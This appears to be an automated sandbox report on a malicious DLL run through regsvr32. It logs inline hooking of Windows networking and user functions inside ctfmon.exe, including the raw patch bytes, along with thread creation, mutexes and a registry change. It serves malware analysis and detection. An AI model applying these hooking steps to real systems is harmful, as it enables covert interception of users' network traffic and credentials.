ProcessInformation success or wait 3 1138879
+ Chronological sections
Operation Data Completion Time
Section loaded Path: \KnownDlls\WS2_32.dll Access: write and read and execute Type: unknown Baseaddress: F40000 Size: 4096 Protection: readonly Mapped to pid: own pid object name not found 2638885055
Section loaded Path: C:\WINDOWS\system32\ws2_32.dll Access: query and write and read and execute Type: image Baseaddress: 71AB0000 Size: 94208 Protection: read write Mapped to pid: own pid success or wait 2638886634
Section loaded Path: \KnownDlls\WS2HELP.dll Access: write and read and execute Type: unknown Baseaddress: 71AB0000 Size: 94208 Protection: read write Mapped to pid: own pid object name not found 2638936691
Section loaded Path: C:\WINDOWS\system32\ws2help.dll Access: query and write and read and execute Type: image Baseaddress: 71AA0000 Size: 32768 Protection: read write Mapped to pid: own pid success or wait 2638944664
Section loaded Path: \KnownDlls\CRYPT32.dll Access: write and read and execute Type: unknown Baseaddress: 77A80000 Size: 610304 Protection: read write Mapped to pid: own pid success or wait 2638968844
Section loaded Path: \KnownDlls\MSASN1.dll Access: write and read and execute Type: unknown Baseaddress: 77B20000 Size: 73728 Protection: read write Mapped to pid: own pid success or wait 2638980201
Section loaded Path: \KnownDlls\WININET.dll Access: write and read and execute Type: unknown Baseaddress: 771B0000 Size: 696320 Protection: read write Mapped to pid: own pid success or wait 2639008323
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: read Type: commit Baseaddress: 1250000 Size: 667648 Protection: readonly Mapped to pid: own pid success or wait 2639025199
Section loaded Path: \KnownDlls\NETAPI32.dll Access: write and read and execute Type: unknown Baseaddress: 5B860000 Size: 348160 Protection: read write Mapped to pid: own pid success or wait 2639093040
Memory allocated PID: 1788 Path: C:\WINDOWS\system32\ctfmon.exe Base: 1250000 Length: 124F8C8 Allocation Type: null Protection: page read and write success or wait 2639143494
Memory allocated PID: 1788 Path: C:\WINDOWS\system32\ctfmon.exe Base: 1250000 Length: 124F8CC Allocation Type: null Protection: page read and write success or wait 2639144556
File opened Path: C:\Documents and Settings\Administrator\Application Data\Ehotpo\agyla.doi.dat Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file Attributes: none Content Overwritten: false object name not found 2639608703
Key value queried Path: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WinSock2\Parameters Name: Enabled object name not found 2639611685
Key value queried Path: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WinSock2\Parameters Name: EnabledV8 success or wait 2639612178
Key value queried Path: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WinSock2\Parameters Name: CleanCookies success or wait 2639612691
Key value queried Path: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WinSock2\Parameters Name: CleanCookies success or wait 2639613332
Key value queried Path: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WinSock2\Parameters Name: 1406 success or wait 2639613890
Key value queried Path: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WinSock2\Parameters Name: 1609 success or wait 2639614372
Key value queried Path: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WinSock2\Parameters Name: 1406 success or wait 2639614949
Key value queried Path: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WinSock2\Parameters Name: 1609 success or wait 2639615433
Key value queried Path: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WinSock2\Parameters Name: 1406 success or wait 2639615923
Key value queried Path: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WinSock2\Parameters Name: 1609 success or wait 2639616673
Key value queried Path: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WinSock2\Parameters Name: 1406 success or wait 2639617160
Key value queried Path: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WinSock2\Parameters Name: 1609 success or wait 2639617641
Key value queried Path: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WinSock2\Parameters Name: 1406 success or wait 2639618132
Key value queried Path: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WinSock2\Parameters Name: 1609 success or wait 2639618613
Memory allocated PID: 1788 Path: C:\WINDOWS\system32\ctfmon.exe Base: A50000 Length: 124F4C0 Allocation Type: null Protection: page execute and read and write success or wait 2639619442
Memory attributes changed PID: 1788 Path: C:\WINDOWS\system32\ctfmon.exe Base: 7C90D1AE Length: 1000 New Protection: page execute and read and write Old Protection: page execute read success or wait 2639621017
Memory read PID: 1788 Path: C:\WINDOWS\system32\ctfmon.exe Base: 7C90D1AE Length: 30 Value: B8 35 00 00 00 BA 00 03 FE 7F FF 12 C2 20 00 90 B8 36 00 00 00 BA 00 03 FE 7F FF 12 C2 10 success or wait 2639621313
Memory written PID: 1788 Path: C:\WINDOWS\system32\ctfmon.exe Base: A50000 Length: 10 Value: B8 35 00 00 00 E9 A9 D1 EB 7B success or wait 2639622100
Memory written PID: 1788 Path: C:\WINDOWS\system32\ctfmon.exe Base: 7C90D1AE Length: 5 Value: E9 A4 AE 81 84 success or wait 2639622875
Memory attributes changed PID: 1788 Path: C:\WINDOWS\system32\ctfmon.exe Base: 7C90D1AE Length: 1000 New Protection: page execute read Old Protection: page execute and read and write success or wait 2639623136
Memory attributes changed PID: 1788 Path: C:\WINDOWS\system32\ctfmon.exe Base: 7C91632D Length: 1000 New Protection: page execute and read and write Old Protection: page execute read success or wait 2639624633
Memory read PID: 1788 Path: C:\WINDOWS\system32\ctfmon.exe Base: 7C91632D Length: 30 Value: 68 6C 02 00 00 68 80 64 91 7C E8 8F 85 FF FF A1 C8 E0 97 7C 89 45 E4 8B 45 08 89 85 B4 FD success or wait 2639624927
Memory written PID: 1788 Path: C:\WINDOWS\system32\ctfmon.exe Base: A5000A Length: 10 Value: 68 6C 02 00 00 E9 1E 63 EC 7B success or wait 2639625704
Memory written PID: 1788 Path: C:\WINDOWS\system32\ctfmon.exe Base: 7C91632D Length: 5 Value: E9 09 1F 81 84 success or wait 2639626459
Memory attributes changed PID: 1788 Path: C:\WINDOWS\system32\ctfmon.exe Base: 7C91632D Length: 1000 New Protection: page execute read Old Protection: page execute and read and write success or wait 2639626723
Memory attributes changed PID: 1788 Path: C:\WINDOWS\system32\ctfmon.exe Base: 77212EBC Length: 1000 New Protection: page execute and read and write Old Protection: page execute read success or wait 2639627280
Memory read PID: 1788 Path: C:\WINDOWS\system32\ctfmon.exe Base: 77212EBC Length: 30 Value: 8B FF 55 8B EC 83 EC 14 53 33 DB 56 33 F6 33 C0 39 5D 08 57 89 5D F8 89 5D EC 89 5D FC 75 success or wait 2639627568
Memory written PID: 1788 Path: C:\WINDOWS\system32\ctfmon.exe Base: A50014 Length: 10 Value: 8B FF 55 8B EC E9 A3 2E 7C 76 success or wait 2639629554
Memory written PID: 1788 Path: C:\WINDOWS\system32\ctfmon.exe Base: 77212EBC Length: 5 Value: E9 FD 4B F0 89 success or wait 2639630298
Memory attributes changed PID: 1788 Path: C:\WINDOWS\system32\ctfmon.exe Base: 77212EBC Length: 1000 New Protection: page execute read Old Protection: page execute and read and write success or wait 2639630558
Memory attributes changed PID: 1788 Path: C:\WINDOWS\system32\ctfmon.exe Base: 771C60A1 Length: 1000 New Protection: page execute and read and write Old Protection: page execute read success or wait 2639631665
Memory read PID: 1788 Path: C:\WINDOWS\system32\ctfmon.exe Base: 771C60A1 Length: 30 Value: 8B FF 55 8B EC 6A 13 6A 00 FF 75 18 FF 75 14 FF 75 10 FF 75 0C FF 75 08 E8 36 C6 FF FF 5D success or wait 2639631952
Memory written PID: 1788 Path: C:\WINDOWS\system32\ctfmon.exe Base: A5001E Length: 10 Value: 8B FF 55 8B EC E9 7E 60 77 76 success or wait 2639632768
Memory written PID: 1788 Path: C:\WINDOWS\system32\ctfmon.exe Base: 771C60A1 Length: 5 Value: E9 6F 1A F5 89 success or wait 2639633513
Memory attributes changed PID: 1788 Path: C:\WINDOWS\system32\ctfmon.exe Base: 771C60A1 Length: 1000 New Protection: page execute read Old Protection: page execute and read and write success or wait 2639633773
Memory attributes changed PID: 1788 Path: C:\WINDOWS\system32\ctfmon.exe Base: 771CE9C1 Length: 1000 New Protection: page execute and read and write Old Protection: page execute read success or wait 2639634785
Memory read PID: 1788 Path: C:\WINDOWS\system32\ctfmon.exe Base: 771CE9C1 Length: 30 Value: 8B FF 55 8B EC 83 EC 14 53 56 33 C0 57 33 D2 33 DB 33 FF 33 C9 39 55 08 89 45 F8 89 45 EC success or wait 2639637749
Memory written PID: 1788 Path: C:\WINDOWS\system32\ctfmon.exe Base: A50028 Length: 10 Value: 8B FF 55 8B EC E9 94 E9 77 76 success or wait 2639639409
Memory written PID: 1788 Path: C:\WINDOWS\system32\ctfmon.exe Base: 771CE9C1 Length: 5 Value: E9 A6 91 F4 89 success or wait 2639640990
Memory attributes changed PID: 1788 Path: C:\WINDOWS\system32\ctfmon.exe Base: 771CE9C1 Length: 1000 New Protection: page execute read Old Protection: page execute and read and write success or wait 2639641256
Memory attributes changed PID: 1788 Path: C:\WINDOWS\system32\ctfmon.exe Base: 77212FC1 Length: 1000 New Protection: page execute and read and write Old Protection: page execute read success or wait 2639642242
Memory read PID: 1788 Path: C:\WINDOWS\system32\ctfmon.exe Base: 77212FC1 Length: 30 Value: 8B FF 55 8B EC 53 56 57 33 DB 33 C0 33 C9 33 D2 33 FF 39 5D 10 75 39 8B 75 0C 85 F6 74 21 success or wait 2639642822
Memory written PID: 1788 Path: C:\WINDOWS\system32\ctfmon.exe Base: A50032 Length: 10 Value: 8B FF 55 8B EC E9 8A 2F 7C 76 success or wait 2639644383
Memory written PID: 1788 Path: C:\WINDOWS\system32\ctfmon.exe Base: 77212FC1 Length: 5 Value: E9 4B 4C F0 89 success or wait 2639645958
Memory attributes changed PID: 1788 Path: C:\WINDOWS\system32\ctfmon.exe Base: 77212FC1 Length: 1000 New Protection: page execute read Old Protection: page execute and read and write success or wait 2639646181
Memory attributes changed PID: 1788 Path: C:\WINDOWS\system32\ctfmon.exe Base: 771C4D8C Length: 1000 New Protection: page execute and read and write Old Protection: page execute read success or wait 2639647723
Memory read PID: 1788 Path: C:\WINDOWS\system32\ctfmon.exe Base: 771C4D8C Length: 30 Value: 8B FF 55 8B EC 51 51 53 56 33 DB 33 F6 F6 05 94 BD 23 77 01 89 5D FC 0F 84 BA 7E 00 00 39 success or wait 2639648379
Memory written PID: 1788 Path: C:\WINDOWS\system32\ctfmon.exe Base: A5003C Length: 10 Value: 8B FF 55 8B EC E9 4B 4D 77 76 success or wait 2639650070
Memory written PID: 1788 Path: C:\WINDOWS\system32\ctfmon.exe Base: 771C4D8C Length: 5 Value: E9 25 2F F5 89 success or wait 2639651825
Memory attributes changed PID: 1788 Path: C:\WINDOWS\system32\ctfmon.exe Base: 771C4D8C Length: 1000 New Protection: page execute read Old Protection: page execute and read and write success or wait 2639652090
Memory attributes changed PID: 1788 Path: C:\WINDOWS\system32\ctfmon.exe Base: 771C82EA Length: 1000 New Protection: page execute and read and write Old Protection: page execute read success or wait 2639653829
Memory read PID: 1788 Path: C:\WINDOWS\system32\ctfmon.exe Base: 771C82EA Length: 30 Value: 8B FF 55 8B EC 83 EC 24 53 33 DB 39 1D 8C B8 23 77 57 89 5D F4 89 5D F8 89 5D F0 C7 45 E8 success or wait 2639654453
Memory written PID: 1788 Path: C:\WINDOWS\system32\ctfmon.exe Base: A50046 Length: 10 Value: 8B FF 55 8B EC E9 9F 82 77 76 success or wait 2639656047
Memory written PID: 1788 Path: C:\WINDOWS\system32\ctfmon.exe Base: 771C82EA Length: 5 Value: E9 0A FA F4 89 success or wait 2639657574
Memory attributes changed PID: 1788 Path: C:\WINDOWS\system32\ctfmon.exe Base: 771C82EA Length: 1000 New Protection: page execute read Old Protection: page execute and read and write success or wait 2639657838
Memory attributes changed PID: 1788 Path: C:\WINDOWS\system32\ctfmon.exe Base: 771F9100 Length: 1000 New Protection: page execute and read and write Old Protection: page execute read success or wait 2639659014
Memory read PID: 1788 Path: C:\WINDOWS\system32\ctfmon.exe Base: 771F9100 Length: 30 Value: 8B FF 55 8B EC 83 EC 20 53 56 33 C0 57 33 FF 40 39 3D 8C B8 23 77 89 7D FC 89 7D F8 89 45 success or wait 2639659685
Memory written PID: 1788 Path: C:\WINDOWS\system32\ctfmon.exe Base: A50050 Length: 10 Value: 8B FF 55 8B EC E9 AB 90 7A 76 success or wait 2639661624
Memory written PID: 1788 Path: C:\WINDOWS\system32\ctfmon.exe Base: 771F9100 Length: 5 Value: E9 34 EC F1 89 success or wait 2639663964
Memory attributes changed PID: 1788 Path: C:\WINDOWS\system32\ctfmon.exe Base: 771F9100 Length: 1000 New Protection: page execute read Old Protection: page execute and read and write success or wait 2639664613
Memory attributes changed PID: 1788 Path: C:\WINDOWS\system32\ctfmon.exe Base: 771D89F7 Length: 1000 New Protection: page execute and read and write Old Protection: page execute read success or wait 2639666092
Memory read PID: 1788 Path: C:\WINDOWS\system32\ctfmon.exe Base: 771D89F7 Length: 30 Value: 8B FF 55 8B EC 83 EC 10 53 33 DB 39 1D 8C B8 23 77 56 57 89 5D FC C7 45 F8 01 00 00 00 0F success or wait 2639666714
Memory written PID: 1788 Path: C:\WINDOWS\system32\ctfmon.exe Base: A5005A Length: 10 Value: 8B FF 55 8B EC E9 98 89 78 76 success or wait 2639667607
Memory written PID: 1788 Path: C:\WINDOWS\system32\ctfmon.exe Base: 771D89F7 Length: 5 Value: E9 8B F3 F3 89 success or wait 2639668467
Memory attributes changed PID: 1788 Path: C:\WINDOWS\system32\ctfmon.exe Base: 771D89F7 Length: 1000 New Protection: page execute read Old Protection: page execute and read and write success or wait 2639668727
Memory attributes changed PID: 1788 Path: C:\WINDOWS\system32\ctfmon.exe Base: 771C79C2 Length: 1000 New Protection: page execute and read and write Old Protection: page execute read success or wait 2639669907
Memory read PID: 1788 Path: C:\WINDOWS\system32\ctfmon.exe Base: 771C79C2 Length: 30 Value: 6A 2C 68 10 7B 1C 77 E8 A7 9C FE FF 33 DB 89 5D DC 89 5D E4 39 1D 8C B8 23 77 0F 84 E8 95 success or wait 2639670194
Memory written PID: 1788 Path: C:\WINDOWS\system32\ctfmon.exe Base: A50064 Length: 12 Value: 6A 2C 68 10 7B 1C 77 E9 59 79 77 76 success or wait 2639672892
Memory written PID: 1788 Path: C:\WINDOWS\system32\ctfmon.exe Base: 771C79C2 Length: 5 Value: E9 F0 03 F5 89 success or wait 2639674574
Memory attributes changed PID: 1788 Path: C:\WINDOWS\system32\ctfmon.exe Base: 771C79C2 Length: 1000 New Protection: page execute read Old Protection: page execute and read and write success or wait 2639674837
Memory attributes changed PID: 1788 Path: C:\WINDOWS\system32\ctfmon.exe Base: 771F9C53 Length: 1000 New Protection: page execute and read and write Old Protection: page execute read success or wait 2639676185
Memory read PID: 1788 Path: C:\WINDOWS\system32\ctfmon.exe Base: 771F9C53 Length: 30 Value: 8B FF 55 8B EC 6A 01 FF 75 0C FF 75 08 E8 1A F4 FD FF 5D C2 08 00 90 90 90 90 90 8B FF 55 success or wait 2639676763
Memory written PID: 1788 Path: C:\WINDOWS\system32\ctfmon.exe Base: A50070 Length: 10 Value: 8B FF 55 8B EC E9 DE 9B 7A 76 success or wait 2639679848
Memory written PID: 1788 Path: C:\WINDOWS\system32\ctfmon.exe Base: 771F9C53 Length: 5 Value: E9 B4 E1 F1 89 success or wait 2639681536
Memory attributes changed PID: 1788 Path: C:\WINDOWS\system32\ctfmon.exe Base: 771F9C53 Length: 1000 New Protection: page execute read Old Protection: page execute and read and write success or wait 2639681754
Memory attributes changed PID: 1788 Path: C:\WINDOWS\system32\ctfmon.exe Base: 771D9064 Length: 1000 New Protection: page execute and read and write Old Protection: page execute read success or wait 2639683326
Memory read PID: 1788 Path: C:\WINDOWS\system32\ctfmon.exe Base: 771D9064 Length: 30 Value: 8B FF 55 8B EC 6A 00 FF 75 0C FF 75 08 E8 09 00 00 00 5D C2 08 00 90 90 90 90 90 8B FF 55 success or wait 2639683971
Memory written PID: 1788 Path: C:\WINDOWS\system32\ctfmon.exe Base: A5007A Length: 10 Value: 8B FF 55 8B EC E9 E5 8F 78 76 success or wait 2639685791
Memory written PID: 1788 Path: C:\WINDOWS\system32\ctfmon.exe Base: 771D9064 Length: 5 Value: E9 BB ED F3 89 success or wait 2639688643
Memory attributes changed PID: 1788 Path: C:\WINDOWS\system32\ctfmon.exe Base: 771D9064 Length: 1000 New Protection: page execute read Old Protection: page execute and read and write success or wait 2639688910
Memory attributes changed PID: 1788 Path: C:\WINDOWS\system32\ctfmon.exe Base: 771BB1D8 Length: 1000 New Protection: page execute and read and write Old Protection: page execute read success or wait 2639690597
Memory read PID: 1788 Path: C:\WINDOWS\system32\ctfmon.exe Base: 771BB1D8 Length: 30 Value: 8B FF 55 8B EC 83 EC 48 53 8B 5D 10 56 33 F6 39 75 14 57 8B 7D 0C C7 45 F4 01 00 00 00 89 success or wait 2639691532
Memory written PID: 1788 Path: C:\WINDOWS\system32\ctfmon.exe Base: A50084 Length: 10 Value: 8B FF 55 8B EC E9 4F B1 76 76 success or wait 2639693675
Memory written PID: 1788 Path: C:\WINDOWS\system32\ctfmon.exe Base: 771BB1D8 Length: 5 Value: E9 5F CC F5 89 success or wait 2639695392
Memory attributes changed PID: 1788 Path: C:\WINDOWS\system32\ctfmon.exe Base: 771BB1D8 Length: 1000 New Protection: page execute read Old Protection: page execute and read and write success or wait 2639696597
Memory attributes changed PID: 1788 Path: C:\WINDOWS\system32\ctfmon.exe Base: 71AB3E2B Length: 1000 New Protection: page execute and read and write Old Protection: page execute read success or wait 2639696968
Memory read PID: 1788 Path: C:\WINDOWS\system32\ctfmon.exe Base: 71AB3E2B Length: 30 Value: 8B FF 55 8B EC 51 81 3D 50 40 AC 71 29 2C AB 71 56 0F 84 BC 4F 00 00 E8 3A E8 FF FF 85 C0 success or wait 2639697263
Memory written PID: 1788 Path: C:\WINDOWS\system32\ctfmon.exe Base: A5008E Length: 10 Value: 8B FF 55 8B EC E9 98 3D 06 71 success or wait 2639698989
Memory written PID: 1788 Path: C:\WINDOWS\system32\ctfmon.exe Base: 71AB3E2B Length: 5 Value: E9 3E E9 66 8F success or wait 2639700704
Memory attributes changed PID: 1788 Path: C:\WINDOWS\system32\ctfmon.exe Base: 71AB3E2B Length: 1000 New Protection: page execute read Old Protection: page execute and read and write success or wait 2639701893
Memory read PID: 1788 Path: C:\WINDOWS\system32\ctfmon.exe Base: 71AB4C27 Length: 30 Value: 8B FF 55 8B EC 83 EC 10 56 57 33 FF 81 3D 50 40 AC 71 29 2C AB 71 0F 84 25 6A 00 00 8D 45 success or wait 2639702542
Memory read PID: 1788 Path: C:\WINDOWS\system32\ctfmon.exe Base: 71AB68FA Length: 30 Value: 8B FF 55 8B EC 51 51 81 3D 50 40 AC 71 29 2C AB 71 56 0F 84 CD 4D 00 00 8D 45 F8 50 E8 98 success or wait 2639707881
Memory read PID: 1788 Path: C:\WINDOWS\system32\ctfmon.exe Base: 71AB676F Length: 30 Value: 8B FF 55 8B EC 83 EC 10 53 33 DB 81 3D 50 40 AC 71 29 2C AB 71 56 0F 84 5E 4A 00 00 8D 45 success or wait 2639713051
Memory read PID: 1788 Path: C:\WINDOWS\system32\ctfmon.exe Base: 71AB4CB5 Length: 30 Value: 8B FF 55 8B EC 51 51 81 3D 50 40 AC 71 29 2C AB 71 56 0F 84 80 65 00 00 8D 45 F8 50 E8 DD success or wait 2639718384
Memory read PID: 1788 Path: C:\WINDOWS\system32\ctfmon.exe Base: 7E41ECA3 Length: 30 Value: B8 D7 11 00 00 BA 00 03 FE 7F FF 12 C2 0C 00 90 90 90 90 90 6A 2F 6A 01 E8 EE 97 FF FF 6A success or wait 2639725281
Memory read PID: 1788 Path: C:\WINDOWS\system32\ctfmon.exe Base: 7E41FE6E Length: 30 Value: B8 2E 12 00 00 BA 00 03 FE 7F FF 12 C2 04 00 33 FF 47 83 7D E4 FF 0F 85 AC AC FF FF C7 45 success or wait 2639731988
Memory read PID: 1788 Path: C:\WINDOWS\system32\ctfmon.exe Base: 7E428D20 Length: 30 Value: 6A 14 68 90 8D 42 7E E8 94 F8 FE FF E8 0B F9 FE FF 83 3D 8C 10 47 7E 00 75 08 85 C0 0F 84 success or wait 2639740664
Memory read PID: 1788 Path: C:\WINDOWS\system32\ctfmon.exe Base: 7E42C17E Length: 30 Value: 6A 14 68 F0 C1 42 7E E8 36 C4 FE FF E8 AD C4 FE FF 83 3D 8C 10 47 7E 00 75 08 85 C0 0F 84 success or wait 2639750101
Memory read PID: 1788 Path: C:\WINDOWS\system32\ctfmon.exe Base: 7E423D3A Length: 30 Value: 8B FF 55 8B EC 8B 4D 08 E8 99 47 FF FF 85 C0 74 11 6A 00 FF 75 14 FF 75 10 FF 75 0C 50 E8 success or wait 2639759117
Memory read PID: 1788 Path: C:\WINDOWS\system32\ctfmon.exe Base: 7E43E577 Length: 30 Value: 8B FF 55 8B EC 8B 4D 08 E8 5C 9F FD FF 85 C0 74 11 6A 01 FF 75 14 FF 75 10 FF 75 0C 50 E8 success or wait 2639765496
Memory read PID: 1788 Path: C:\WINDOWS\system32\ctfmon.exe Base: 7E430833 Length: 30 Value: 8B FF 55 8B EC 6A 00 FF 75 18 FF 75 14 FF 75 10 FF 75 0C FF 75 08 E8 09 00 00 00 5D C2 14 success or wait 2639771769
Memory read PID: 1788 Path: C:\WINDOWS\system32\ctfmon.exe Base: 7E44F965 Length: 30 Value: 8B FF 55 8B EC 6A 01 FF 75 18 FF 75 14 FF 75 10 FF 75 0C FF 75 08 E8 D7 0E FE FF 5D C2 14 success or wait 2639777497
Memory read PID: 1788 Path: C:\WINDOWS\system32\ctfmon.exe Base: 7E430A47 Length: 30 Value: 8B FF 55 8B EC 6A 00 FF 75 14 FF 75 10 FF 75 0C FF 75 08 E8 09 00 00 00 5D C2 10 00 90 90 success or wait 2639783538
Memory read PID: 1788 Path: C:\WINDOWS\system32\ctfmon.exe Base: 7E44F9B4 Length: 30 Value: 8B FF 55 8B EC 6A 01 FF 75 14 FF 75 10 FF 75 0C FF 75 08 E8 9C 10 FE FF 5D C2 10 00 90 90 success or wait 2639825606
Memory read PID: 1788 Path: C:\WINDOWS\system32\ctfmon.exe Base: 7E42A01E Length: 30 Value: 8B FF 55 8B EC 6A 00 FF 75 18 FF 75 14 FF 75 10 FF 75 0C FF 75 08 E8 89 FF FF FF 5D C2 14 success or wait 2639829628
System info queried Type: ProcessInformation success or wait 2640130022
Section loaded Path: unknown Access: query and write and read Type: commit Baseaddress: B10000 Size: 12288 Protection: read write Mapped to pid: own pid success or wait 2640136003
Thread created PID: 1788 TID: 1284 EIP: 7C8106F9 Imagepath: C:\WINDOWS\system32\ctfmon.exe Injected: false success or wait 2640450480
Mutant created Name: \BaseNamedObjects\Local\{FA8F3AD4-84A8-4B6A-FB56-FD56EA1DDE44} object name exists 2640452308
System info queried Type: ProcessInformation success or wait 2640455838
Section loaded Path: unknown Access: query and write and read Type: commit Baseaddress: B10000 Size: 12288 Protection: read write Mapped to pid: own pid success or wait 2640461603
Thread created PID: 1788 TID: 440 EIP: 7C8106F9 Imagepath: C:\WINDOWS\system32\ctfmon.exe Injected: false success or wait 2640894695
Mutant created Name: \BaseNamedObjects\Local\{FA8F3AD5-84A9-4B6A-FB56-FD56EA1DDE44} object name exists 2640896751
System info queried Type: ProcessInformation success or wait 2640897410
Section loaded Path: unknown Access: query and write and read Type: commit Baseaddress: B10000 Size: 12288 Protection: read write Mapped to pid: own pid success or wait 2640903273
Thread created PID: 1788 TID: 1980 EIP: 7C8106F9 Imagepath: C:\WINDOWS\system32\ctfmon.exe Injected: false success or wait 2641858459
Mutant created Name: \BaseNamedObjects\Global\{F1516FED-D191-40B4-FB56-FD56EA1DDE44} success or wait 2641860154
Key value queried Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Noycir Name: 15807505 success or wait 2641860823
Key value queried Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Noycir Name: 15807505 success or wait 2641861350
Key value replaced with new Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Noycir Name: 15807505 Type: Binary Data: C4 D1 56 A5 Old data: C5 D1 56 A5 success or wait 2641921699
+ Sections
+ General
Start time: 05:44:44
Start date: 08/12/2011
Path: C:\WINDOWS\system32\regsvr32.exe
Commandline: regsvr32 -s C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\wpbt0.dll
Imagebase: 0x1000000
File size: 11776 bytes
MD5 hash: FBDB9D0935B9907B809B381FDDF1627F
Section Activities:
+ Section loaded by Windows
File Path Access Type Base Size Mapped to pid Protection Completion Count
\KnownDlls\kernel32.dll write and read and execute unknown 7C800000 1007616 own pid read write success or wait 1
unknown query and write and read and execute and extend size reserve 7C800000 1007616 own pid read write success or wait 1
\NLS\NlsSectionUnicode read unknown 1B0000 90112 own pid readonly success or wait 1
\NLS\NlsSectionLocale read unknown 1D0000 266240 own pid readonly success or wait 1
\NLS\NlsSectionSortkey query and read unknown 220000 266240 own pid readonly success or wait 1
\NLS\NlsSectionSortTbls read unknown 270000 24576 own pid readonly success or wait 1
\NLS\NlsSectionSortkey00000409 read unknown 270000 24576 own pid readonly object name not found 1
\NLS\NlsSectionSortkey00000409 read unknown 270000 24576 own pid readonly object name not found 1
\KnownDlls\msvcrt.dll write and read and execute unknown 77C10000 360448 own pid read write success or wait 1
\KnownDlls\ADVAPI32.dll write and read and execute unknown 77DD0000 634880 own pid read write success or wait 1
\KnownDlls\RPCRT4.dll write and read and execute unknown 77E70000 602112 own pid read write success or wait 1
\KnownDlls\Secur32.dll write and read and execute unknown 77FE0000 69632 own pid read write success or wait 1
\KnownDlls\USER32.dll write and read and execute unknown 7E410000 593920 own pid read write success or wait 1
\KnownDlls\GDI32.dll write and read and execute unknown 77F10000 299008 own pid read write success or wait 1
\KnownDlls\ole32.dll write and read and execute unknown 774E0000 1302528 own pid read write success or wait 1
\KnownDlls\ShimEng.dll write and read and execute unknown 774E0000 1302528 own pid read write object name not found 1
C:\WINDOWS\system32\shimeng.dll query and write and read and execute image 5CB70000 155648 own pid read write success or wait 1
C:\WINDOWS\AppPatch\sysmain.sdb read commit 280000 1208320 own pid readonly success or wait 1
C:\WINDOWS\AppPatch\acgenral.dll write and read and execute commit 3C0000 1855488 own pid execute success or wait 1
C:\WINDOWS\AppPatch\acgenral.dll write and read and execute commit 3C0000 1855488 own pid execute success or wait 1
C:\WINDOWS\AppPatch\acgenral.dll query and write and read and execute image 6F880000 1875968 own pid read write success or wait 1
\KnownDlls\WINMM.dll write and read and execute unknown 6F880000 1875968 own pid read write object name not found 1
C:\WINDOWS\system32\winmm.dll query and write and read and execute image 76B40000 184320 own pid read write success or wait 1
\KnownDlls\OLEAUT32.dll write and read and execute unknown 77120000 569344 own pid read write success or wait 1
\KnownDlls\MSACM32.dll write and read and execute unknown 77120000 569344 own pid read write object name not found 1
C:\WINDOWS\system32\msacm32.dll query and write and read and execute image 77BE0000 86016 own pid read write success or wait 1
\KnownDlls\VERSION.dll write and read and execute unknown 77C00000 32768 own pid read write success or wait 1
\KnownDlls\SHELL32.dll write and read and execute unknown 7C9C0000 8482816 own pid read write success or wait 1
\KnownDlls\SHLWAPI.dll write and read and execute unknown 77F60000 483328 own pid read write success or wait 1
\KnownDlls\USERENV.dll write and read and execute unknown 769C0000 737280 own pid read write success or wait 1
\KnownDlls\UxTheme.dll write and read and execute unknown 769C0000 737280 own pid read write object name not found 1
C:\WINDOWS\system32\uxtheme.dll query and write and read and execute image 5AD70000 229376 own pid read write success or wait 1
\NLS\NlsSectionCType read unknown 3D0000 12288 own pid readonly success or wait 1
C:\WINDOWS\system32\imm32.dll write and read and execute commit 350000 110592 own pid execute success or wait 1
C:\WINDOWS\system32\imm32.dll write and read and execute commit 350000 110592 own pid execute success or wait 1
C:\WINDOWS\system32\imm32.dll query and write and read and execute image 76390000 118784 own pid read write success or wait 1
C:\WINDOWS\system32\shell32.dll read commit 1010000 8462336 own pid readonly success or wait 1
C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-ww_61e65202\comctl32.dll write and read and execute commit 8B0000 1056768 own pid execute success or wait 1
C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-ww_61e65202\comctl32.dll query and write and read and execute image 773D0000 1060864 own pid read write success or wait 1
C:\WINDOWS\WindowsShell.Manifest write and read and execute commit 380000 4096 own pid execute success or wait 1
C:\WINDOWS\WindowsShell.Manifest query and read commit 380000 4096 own pid readonly success or wait 1
C:\WINDOWS\WindowsShell.Manifest read commit 380000 4096 own pid readonly success or wait 1
\KnownDlls\comctl32.dll write and read and execute unknown 5D090000 630784 own pid read write success or wait 1
C:\WINDOWS\system32\comctl32.dll read commit 8B0000 618496 own pid readonly success or wait 1
C:\WINDOWS\system32\rpcss.dll write and read and execute commit 8B0000 401408 own pid execute success or wait 1
C:\WINDOWS\system32\msctf.dll write and read and execute commit 8B0000 299008 own pid execute success or wait 1
C:\WINDOWS\system32\msctf.dll query and write and read and execute image 74720000 311296 own pid read write success or wait 1
\BaseNamedObjects\CiceroSharedMemDefaultS-1-5-21-507921405-1960408961-839522115-500 query and write and read commit 74720000 311296 own pid read write object name exists 1
\BaseNamedObjects\CTF.TimListCache.FMPDefaultS-1-5-21-507921405-1960408961-839522115-500SFM.DefaultS-1-5-21-507921405-1960408961-839522115-500 query and write and read and execute and extend size unknown 8C0000 262144 own pid read write success or wait 1
+ Section loaded by program
File Path Access Type Base Size Mapped to pid Protection Completion Count Source Address
User Activities:
+ Window enumerated
